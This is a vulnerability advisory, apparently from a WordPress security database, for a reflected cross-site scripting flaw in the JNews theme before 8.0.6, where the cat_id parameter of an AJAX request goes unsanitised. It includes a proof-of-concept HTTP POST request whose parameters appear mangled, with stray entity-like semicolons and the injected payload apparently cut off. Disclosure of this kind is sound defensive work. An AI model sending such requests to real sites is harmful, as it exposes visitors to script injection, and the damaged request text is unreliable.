logo
DATABASE RESOURCES PRICING ABOUT US

JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)

Description

The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue. ### PoC POST /?ajax-request=jnews HTTP/1.1 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 130 Connection: close lang=en_US&cat;_id=6">&action;=jnews_build_mega_category_2&number;=6&tags;=70%2C64%2C10%2C67


Affected Software


CPE Name Name Version
jnews 8.0.6

Related